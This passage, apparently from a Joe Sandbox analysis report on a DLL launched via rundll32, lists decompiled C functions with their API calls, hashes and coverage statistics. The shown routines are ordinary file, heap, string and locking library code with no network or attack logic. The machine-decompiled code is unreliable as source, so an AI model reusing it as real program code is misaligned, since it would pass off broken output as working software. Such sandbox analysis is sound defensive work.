                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName___initmbctable
                                                                                                            • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                            • API String ID: 767393020-2837366778
                                                                                                            • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                                                            • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001B190 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001B190(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12, long _a16) {
				long _v8;
				long _v12;
				void* _t21;
				long _t22;
				long _t27;
				signed int _t38;
				signed int _t39;
				signed int _t42;

				_t42 = _a4;
				_v12 = _a8;
				_push(_t38);
				_v8 = _a12;
				_t21 = E1001B08D(_t42);
				_t39 = _t38 | 0xffffffff;
				if(_t21 != _t39) {
					_t22 = SetFilePointer(_t21, _v12,  &_v8, _a16);
					_v12 = _t22;
					if(_t22 != _t39 || GetLastError() == 0) {
						_t15 = ((_t42 & 0x0000001f) + (_t42 & 0x0000001f) * 8) * 4; // 0x0
						 *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) & 0x000000fd;
						_t27 = _v12;
					} else {
						E10013707(_t28);
						goto L5;
					}
				} else {
					 *((intOrPtr*)(E100136F5())) = 9;
					L5:
					_t27 = _t39;
				}
				return _t27;
			}











                                                                                                            0x1001b199
                                                                                                            0x1001b19c
                                                                                                            0x1001b1a2
                                                                                                            0x1001b1a4
                                                                                                            0x1001b1a7
                                                                                                            0x1001b1ac
                                                                                                            0x1001b1b2
                                                                                                            0x1001b1cc
                                                                                                            0x1001b1d4
                                                                                                            0x1001b1d7
                                                                                                            0x1001b202
                                                                                                            0x1001b206
                                                                                                            0x1001b209
                                                                                                            0x1001b1e3
                                                                                                            0x1001b1e4
                                                                                                            0x00000000
                                                                                                            0x1001b1e9
                                                                                                            0x1001b1b4
                                                                                                            0x1001b1b9
                                                                                                            0x1001b1ea
                                                                                                            0x1001b1ea
                                                                                                            0x1001b1ec
                                                                                                            0x1001b212

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,1004C878,00000001,00000000,00000000,00000000,1004C878,1004C878,?,10019815,?,00000000,00000000,00000002,00000000,1004C878), ref: 1001B1CC
                                                                                                            • GetLastError.KERNEL32 ref: 1001B1D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction ID: 53af0a452f36b2f0e5d3ec892390ecf8c1e17cdf248c2bebef8a867a22bb85e5
                                                                                                            • Opcode Fuzzy Hash: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction Fuzzy Hash: FD018476A10659FFCB01DF99CC94C9E7BB9EF45360B154259F410DB191EB70EE808760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001968C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001968C(void* __eflags, signed int _a4, long _a8, long _a12) {
				void* _t11;
				long _t13;
				signed int _t17;
				signed int _t19;
				signed int _t27;
				signed int _t29;

				_t29 = _a4;
				_t11 = E1001B08D(_t29);
				if(_t11 != 0xffffffff) {
					_t27 = SetFilePointer(_t11, _a8, 0, _a12);
					if(_t27 != 0xffffffff) {
						_t13 = 0;
					} else {
						_t13 = GetLastError();
					}
					if(_t13 == 0) {
						_t9 = ((_t29 & 0x0000001f) + (_t29 & 0x0000001f) * 8) * 4; // 0x1004c87c
						 *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) & 0x000000fd;
						_t17 = _t27;
					} else {
						_t17 = E10013707(_t13) | 0xffffffff;
					}
					return _t17;
				} else {
					_t19 = E100136F5();
					 *_t19 = 9;
					return _t19 | 0xffffffff;
				}
			}









                                                                                                            0x1001968d
                                                                                                            0x10019692
                                                                                                            0x1001969b
                                                                                                            0x100196bf
                                                                                                            0x100196c4
                                                                                                            0x100196ce
                                                                                                            0x100196c6
                                                                                                            0x100196c6
                                                                                                            0x100196c6
                                                                                                            0x100196d2
                                                                                                            0x100196f4
                                                                                                            0x100196f8
                                                                                                            0x100196fb
                                                                                                            0x100196d4
                                                                                                            0x100196db
                                                                                                            0x100196db
                                                                                                            0x100196ff
                                                                                                            0x1001969d
                                                                                                            0x1001969d
                                                                                                            0x100196a2
                                                                                                            0x100196ac
                                                                                                            0x100196ac

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,?,?,00000000,10019757,1004C878,00000000,10015998,10042D38,0000000C,1001566D,?,00000000,00000002), ref: 100196B9
                                                                                                            • GetLastError.KERNEL32 ref: 100196C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction ID: a629910bf8626f7fffa0a6a4af3c3ed297814fe42fece7765db2dd3634906eea
                                                                                                            • Opcode Fuzzy Hash: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction Fuzzy Hash: 2201A4362096616BCA11DF7CAC5594A3B94DB86370F220749F570CF1E1DB30EC818771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025478 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10025478(void* __ecx, void* _a4, long _a8) {
				void* __ebp;
				int _t8;
				long _t13;
				void* _t14;
				void* _t15;

				_t12 = __ecx;
				_t13 = _a8;
				_t14 = __ecx;
				if(_t13 != 0) {
					_t8 = WriteFile( *(__ecx + 4), _a4, _t13,  &_a8, 0);
					if(_t8 == 0) {
						_t8 = E100271C6(_t15, GetLastError(),  *((intOrPtr*)(_t14 + 0xc)));
					}
					if(_a8 != _t13) {
						_push( *((intOrPtr*)(_t14 + 0xc)));
						_push(0xffffffff);
						_push(0xd);
						return E10027180(_t12);
					}
				}
				return _t8;
			}








                                                                                                            0x10025478
                                                                                                            0x1002547d
                                                                                                            0x10025482
                                                                                                            0x10025484
                                                                                                            0x10025493
                                                                                                            0x1002549b
                                                                                                            0x100254a7
                                                                                                            0x100254a7
                                                                                                            0x100254af
                                                                                                            0x100254b1
                                                                                                            0x100254b4
                                                                                                            0x100254b6
                                                                                                            0x00000000
                                                                                                            0x100254b8
                                                                                                            0x100254af
                                                                                                            0x100254c0

                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10025493
                                                                                                            • GetLastError.KERNEL32(?), ref: 100254A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 442123175-4125583295
                                                                                                            • Opcode ID: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction ID: 1efd054c324430f6bdfd1b59f081dc2d54efa2d2671d6c80a9c9a9e690e28720
                                                                                                            • Opcode Fuzzy Hash: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction Fuzzy Hash: 74F0A7362006187FDB11AF96EC04F87BBACEF40772F40C11AF92985060D731D5508B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10025438(void* __ecx, void* _a4, long _a8) {
				void* __ebp;
				void* _t15;
				void* _t16;

				_t15 = __ecx;
				if(_a8 != 0) {
					if(ReadFile( *(__ecx + 4), _a4, _a8,  &_a8, 0) == 0) {
						E100271C6(_t16, GetLastError(),  *((intOrPtr*)(_t15 + 0xc)));
					}
					return _a8;
				}
				return 0;
			}






                                                                                                            0x10025440
                                                                                                            0x10025442
                                                                                                            0x1002545f
                                                                                                            0x1002546b
                                                                                                            0x1002546b
                                                                                                            0x00000000
                                                                                                            0x10025470
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 10025457
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10025464
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction ID: 9f7230fa58b18192531b9e87cef107ece2d112799f9fd2653fc72eebc1d7825c
                                                                                                            • Opcode Fuzzy Hash: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction Fuzzy Hash: EDE09232100218BFDB01AFA0EC04FCAB7ACEF08266F80C426FD19C9020D731EA509B54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024C8E Relevance: 5.1, APIs: 4, Instructions: 107stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* __ebp;
				intOrPtr _t39;
				int _t40;
				void* _t50;
				char* _t51;
				intOrPtr _t52;
				char* _t61;
				signed int _t62;
				CHAR* _t64;
				signed int _t73;
				void* _t74;
				CHAR* _t82;
				intOrPtr _t85;
				intOrPtr _t87;

				_t39 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t39;
				_v272 = __ecx;
				if(_a12 == 0) {
					L10:
					_t40 = 0;
					__eflags = 0;
					L11:
					return E100117AE(_t40, _v8);
				}
				_t73 = _a8 << 2;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
				if(_t85 == 0) {
					goto L10;
				}
				_t77 = _a4;
				_t82 = E100017D0(_a4, _t85 + 1);
				if(_t82 == 0) {
					E1001CE3B(_t77);
				}
				_t74 = lstrcpynA;
				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
				_t50 = E10038481(_t82, 0, 0);
				_t51 = _a16;
				_t87 = _t85 - _t50 + 1;
				_v276 = _t87;
				if(_t87 != _t51) {
					L7:
					_t52 = _v272;
					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
						_a12 = _t87 + _t82;
						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
						__eflags = 0x104;
						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
					}
					goto L9;
				} else {
					_t61 = _t51 + _t82;
					_a11 =  *((intOrPtr*)(_t87 + _t82));
					_a16 = _t61;
					 *_t61 = 0;
					_t62 = lstrcmpiA(_a12, _t82);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					_a12 = _t64;
					 *((char*)(_t87 + _t82)) = _a11;
					if(_t64 == 0) {
						goto L7;
					}
					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
					lstrcpynA(_t82,  &_v268, 0x104);
					L9:
					E10006CE2(_t74, _a4, _t82, 0xffffffff);
					_t40 = 1;
					goto L11;
				}
			}





















                                                                                                            0x10024c9b
                                                                                                            0x10024ca1
                                                                                                            0x10024ca5
                                                                                                            0x10024cab
                                                                                                            0x10024db7
                                                                                                            0x10024db7
                                                                                                            0x10024db7
                                                                                                            0x10024db9
                                                                                                            0x10024dc4
                                                                                                            0x10024dc4
                                                                                                            0x10024cb7
                                                                                                            0x10024cbd
                                                                                                            0x10024cc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10024cc8
                                                                                                            0x10024cd5
                                                                                                            0x10024cd9
                                                                                                            0x10024cdb
                                                                                                            0x10024cdb
                                                                                                            0x10024cf0
                                                                                                            0x10024cf7
                                                                                                            0x10024cfe
                                                                                                            0x10024d05
                                                                                                            0x10024d08
                                                                                                            0x10024d0b
                                                                                                            0x10024d11
                                                                                                            0x10024d5d
                                                                                                            0x10024d5d
                                                                                                            0x10024d63
                                                                                                            0x10024d67
                                                                                                            0x10024d7a
                                                                                                            0x10024d7d
                                                                                                            0x10024d82
                                                                                                            0x10024d93
                                                                                                            0x10024da2
                                                                                                            0x10024da2
                                                                                                            0x00000000
                                                                                                            0x10024d13
                                                                                                            0x10024d1a
                                                                                                            0x10024d1c
                                                                                                            0x10024d1f
                                                                                                            0x10024d22
                                                                                                            0x10024d25
                                                                                                            0x10024d2d
                                                                                                            0x10024d2f
                                                                                                            0x10024d30
                                                                                                            0x10024d36
                                                                                                            0x10024d39
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10024d4b
                                                                                                            0x10024d59
                                                                                                            0x10024da7
                                                                                                            0x10024dac
                                                                                                            0x10024db3
                                                                                                            0x00000000
                                                                                                            0x10024db4

                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                                                              • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                                                              • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1551867014-0
                                                                                                            • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                                                            • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013EDE Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013EDE() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x10050a48; // 0x0
				_t26 =  *0x10050a58; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x10050a4c; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x10050a48 =  *0x10050a48 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x10050a58 =  *0x10050a58 + 0x10;
						 *0x10050a4c = _t24;
						_t15 =  *0x10050a48; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}











                                                                                                            0x10013ede
                                                                                                            0x10013ee3
                                                                                                            0x10013eee
                                                                                                            0x10013f24
                                                                                                            0x10013f24
                                                                                                            0x10013f3b
                                                                                                            0x10013f3e
                                                                                                            0x10013f46
                                                                                                            0x10013f49
                                                                                                            0x10013f5c
                                                                                                            0x10013f64
                                                                                                            0x10013f67
                                                                                                            0x10013f7b
                                                                                                            0x10013f7f
                                                                                                            0x10013f81
                                                                                                            0x10013f84
                                                                                                            0x10013f8d
                                                                                                            0x10013f90
                                                                                                            0x10013f69
                                                                                                            0x10013f73
                                                                                                            0x00000000
                                                                                                            0x10013f73
                                                                                                            0x10013f4b
                                                                                                            0x10013f4b
                                                                                                            0x10013f4b
                                                                                                            0x10013f4b
                                                                                                            0x10013f94
                                                                                                            0x10013ef0
                                                                                                            0x10013ef0
                                                                                                            0x10013f05
                                                                                                            0x10013f0d
                                                                                                            0x10013f13
                                                                                                            0x10013f1a
                                                                                                            0x10013f1f
                                                                                                            0x00000000
                                                                                                            0x10013f0f
                                                                                                            0x10013f12
                                                                                                            0x10013f12
                                                                                                            0x10013f0d

                                                                                                            APIs
                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3499195154-0
                                                                                                            • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                                                            • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037A1B Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10037A1B(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1004f350 == 0) {
					E100379F7();
				}
				_t21 = _a4;
				_t24 = 0x1004f158 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x1004f19c);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x1004f19c);
				}
				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}






                                                                                                            0x10037a22
                                                                                                            0x10037a24
                                                                                                            0x10037a24
                                                                                                            0x10037a32
                                                                                                            0x10037a36
                                                                                                            0x10037a40
                                                                                                            0x10037a49
                                                                                                            0x10037a4e
                                                                                                            0x10037a5b
                                                                                                            0x10037a61
                                                                                                            0x10037a61
                                                                                                            0x10037a64
                                                                                                            0x10037a6a
                                                                                                            0x10037a6e
                                                                                                            0x10037a76
                                                                                                            0x10037a7b

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                                                              • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                            • String ID:
                                                                                                            • API String ID: 713024617-0
                                                                                                            • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                                                            • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:9%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:279
                                                                                                            Total number of Limit Nodes:10
